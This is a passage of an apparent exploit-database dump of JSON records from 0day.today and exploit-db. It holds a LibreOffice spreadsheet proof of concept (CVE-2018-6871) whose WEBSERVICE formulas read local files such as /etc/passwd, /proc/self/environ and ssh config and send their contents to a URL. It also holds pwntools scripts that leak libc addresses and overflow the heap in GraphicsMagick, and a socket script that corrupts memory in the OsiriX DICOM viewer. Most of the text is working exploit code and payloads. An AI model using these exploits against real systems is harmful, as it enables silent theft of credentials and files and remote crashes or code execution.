</table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" 
office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\">\r\n <text:p>1383</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\">\r\n <text:p>1370</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\">\r\n <text:p>9</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" 
calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n </table:table>\r\n <table:named-expressions/>\r\n </office:spreadsheet>\r\n </office:body>\r\n</office:document>\r\n```\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/29774"}, {"lastseen": "2018-04-03T00:19:14", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://0day.today/exploit/description/28948", "id": "1337DAY-ID-28948", "type": "zdt", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. 
Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nIndependent security researchers Jeremy Heng (@nn_amon) and Terry Chia (Ayrx) have reported these vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerability details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 
j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value of the profile_length variable is set by the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed, because the increments of i inside the loop body are never re-checked against profile_length.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 are the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] 
Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. 
Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify 
-verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/28948", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-06T09:12:46", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2016-12-16T00:00:00", "published": "2016-12-16T00:00:00", "href": "https://0day.today/exploit/description/26535", "id": "1337DAY-ID-26535", "type": "zdt", "title": "OsiriX DICOM Viewer 8.0.1 - Memory Corruption Exploit", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n#\r\n#\r\n# OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability\r\n#\r\n#\r\n# Vendor: Pixmeo Sarl\r\n# Product web page: http://www.osirix-viewer.com\r\n# Affected version: OsiriX 8.0.1\r\n#\r\n# Summary: With high performance and an intuitive interactive user interface, OsiriX MD is\r\n# the most widely used DICOM viewer in the world. It is the result of more than 10 years of\r\n# research and development in digital imaging. 
It fully supports the DICOM standard for an\r\n# easy integration in your workflow environment and an open platform for development of\r\n# processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive\r\n# innovative technique for 3D and 4D navigation and a complete integration with any PACS.\r\n# OsiriX MD supports 64-bit computing and multithreading for the best performances on the\r\n# most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled.\r\n#\r\n# Summary2: OsiriX is an image processing application for Mac dedicated to DICOM images\r\n# (\".dcm\" / \".DCM\" extension) produced by equipment (MRI, CT, PET, PET-CT, ...).\r\n# Osirix is complementary to existing viewers, in particular to nuclear medicine viewers.\r\n#\r\n# Desc: The vulnerability is caused by the use of a vulnerable collection of libraries that\r\n# are part of the DCMTK toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL.\r\n# A stack/heap buffer overflow/underflow can be triggered when the DICOM Store-SCP service receives\r\n# over the network and processes an ACSE data structure with a wrong length. 
An attacker can\r\n# overflow the stack and the heap of the process when sending large array of bytes to the presentation\r\n# context item length segment of the DICOM standard, potentially resulting in remote code execution\r\n# and/or denial of service scenario.\r\n#\r\n# -------------------------------------------------------------------------------------\r\n#\r\n# (lldb) \r\n# Process 65202 stopped\r\n# * thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1)\r\n# frame #0: 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# OsiriX Lite`parseAssociate:\r\n# -> 0x108978441 <+833>: movzbl (%r10), %eax\r\n# 0x108978445 <+837>: cmpl $0x40, %eax\r\n# 0x108978448 <+840>: movq -0x200(%rbp), %rcx\r\n# 0x10897844f <+847>: je 0x108978513 ; <+1043>\r\n# (lldb) bt\r\n# * thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1)\r\n# * frame #0: 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# frame #1: 0x0000000102fe4363 OsiriX Lite`AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339\r\n# frame #2: 0x0000000102fe14ca OsiriX Lite`PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314\r\n# frame #3: 0x0000000102fdae9c OsiriX Lite`DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348\r\n# frame #4: 0x0000000102facf1e OsiriX Lite`ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462\r\n# frame #5: 0x0000000102c5f28f OsiriX 
Lite`DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207\r\n# frame #6: 0x0000000102c3f9c7 OsiriX Lite`-[DCMTKQueryRetrieveSCP run] + 4999\r\n# frame #7: 0x0000000102987a37 OsiriX Lite`-[AppController startSTORESCP:] + 519\r\n# frame #8: 0x00007fff975b030d Foundation`__NSThread__start__ + 1243\r\n# frame #9: 0x00007fffab021aab libsystem_pthread.dylib`_pthread_body + 180\r\n# frame #10: 0x00007fffab0219f7 libsystem_pthread.dylib`_pthread_start + 286\r\n# frame #11: 0x00007fffab021221 libsystem_pthread.dylib`thread_start + 13\r\n# (lldb) register read\r\n# General Purpose Registers:\r\n# rax = 0x0000000000000103\r\n# rbx = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# rcx = 0x00006100002e6200\r\n# rdx = 0x000000000001ad41\r\n# rdi = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# rsi = 0x00006100002e6200\r\n# rbp = 0x0000700005a4a670\r\n# rsp = 0x0000700005a4a420\r\n# r8 = 0x0000000000000103\r\n# r9 = 0x00000000fb40cfc6\r\n# r10 = 0x00007fab8ac000a1\r\n# r11 = 0x0000000000000041\r\n# r12 = 0x0000700005a4a6b8\r\n# r13 = 0x00000001044c18f0 OsiriX Lite`EC_Normal\r\n# r14 = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# r15 = 0x0000000000008014\r\n# rip = 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# rflags = 0x0000000000010286\r\n# cs = 0x000000000000002b\r\n# fs = 0x0000000000000000\r\n# gs = 0x0000000000000000\r\n#\r\n# -------------------------------------------------------------------------------------\r\n#\r\n# Tested on: OS X 10.12.2 (Sierra)\r\n# OS X 10.12.1 (Sierra)\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2016-5382\r\n# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php\r\n#\r\n# https://tools.ietf.org/html/rfc3240\r\n# https://github.com/commontk/DCMTK/commit/1b6bb76\r\n#\r\n# 29.11.2016\r\n#\r\n \r\n \r\nimport sys, socket\r\n \r\nhello = 
('\\x01\\x00\\x00\\x00\\x80\\x71\\x00\\x01\\x00\\x00\\x4f\\x52\\x54\\x48'\r\n '\\x41\\x4e\\x43\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4a\\x4f'\r\n '\\x58\\x59\\x50\\x4f\\x58\\x59\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x15\\x31\\x2e\\x32\\x2e\\x38\\x34'\r\n '\\x30\\x2e\\x31\\x30\\x30\\x30\\x38\\x2e\\x33\\x2e\\x31\\x2e\\x31\\x2e'\r\n '\\x31\\x20\\x00\\x80\\x00')\r\n \r\nbye = ('\\x50\\x00\\x00\\x0c\\x51\\x00\\x00\\x04\\x00\\x00\\x07\\xde'\r\n '\\x52\\x00\\x00\\x00')\r\n \r\nbuffer = '\\x41\\x42\\x43\\x44' * 10000\r\n \r\nif len(sys.argv) < 3:\r\n print '\\nUsage: ' +sys.argv[0]+ ' <target> <port>'\r\n print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 11112\\n'\r\n sys.exit(0)\r\n \r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect = s.connect((host, port))\r\ns.settimeout(251)\r\ns.send(hello+buffer+bye)\r\ns.close\n\n# 0day.today [2018-02-06] #", "sourceHref": "https://0day.today/exploit/26535", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-02-12T13:36:08", "bulletinFamily": "exploit", "description": "LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure. CVE-2018-6871. 
Remote exploit for Linux platform", "modified": "2018-02-10T00:00:00", "published": "2018-02-10T00:00:00", "id": "EDB-ID:44022", "href": "https://www.exploit-db.com/exploits/44022/", "type": "exploitdb", "title": "LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure", "sourceData": "# Vulnerability description\r\n\r\n[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)\r\n\r\n## First part\r\n\r\nLibreOffice supports COM.MICROSOFT.WEBSERVICE function:\r\n\r\n https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4\r\n\r\nThe function is required to obtain data by URL, usually used as:\r\n\r\n =FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\")\r\n\r\nIn original:\r\n\r\n For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.\r\n\r\nIn LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.\r\n\r\n## Second part\r\n\r\nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.\r\n\r\n# Exploitation\r\n\r\nTo read file you need just:\r\n\r\n =WEBSERVICE(\"/etc/passwd\")\r\n\r\nThis function can also be used to send a file:\r\n\r\n =WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\"))\r\n\r\nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path.\r\n\r\n =MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\",\r\n\r\nAlso you can parse other files too, like a ~/.ssh/config or something like that.\r\n\r\nFor other than LibreOffice Calc formats you just need embed calc object 
to other document (I checked it works).\r\n\r\n# Impact\r\n\r\nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.\r\n\r\n# Acknowledgment\r\n\r\nVulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).\r\n\r\n - - -\r\n\r\n# poc.fods\r\n\r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n\r\n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" 
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\">\r\n <office:automatic-styles>\r\n <style:style style:name=\"co1\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co2\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co3\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co4\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co5\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co6\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/>\r\n </style:style>\r\n 
<style:style style:name=\"ro1\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ro2\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/>\r\n </style:style>\r\n <style:style style:name=\"ro3\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\">\r\n <style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/>\r\n </style:style>\r\n <style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/>\r\n <style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:text-properties style:use-window-font-color=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:table-cell-properties fo:background-color=\"#f3715a\"/>\r\n </style:style>\r\n <style:page-layout style:name=\"pm1\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/>\r\n </style:footer-style>\r\n </style:page-layout>\r\n <style:page-layout style:name=\"pm2\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n 
<style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:footer-style>\r\n </style:page-layout>\r\n </office:automatic-styles>\r\n <office:body>\r\n <office:spreadsheet>\r\n <table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/>\r\n <table:table table:name=\"Sheet1\" 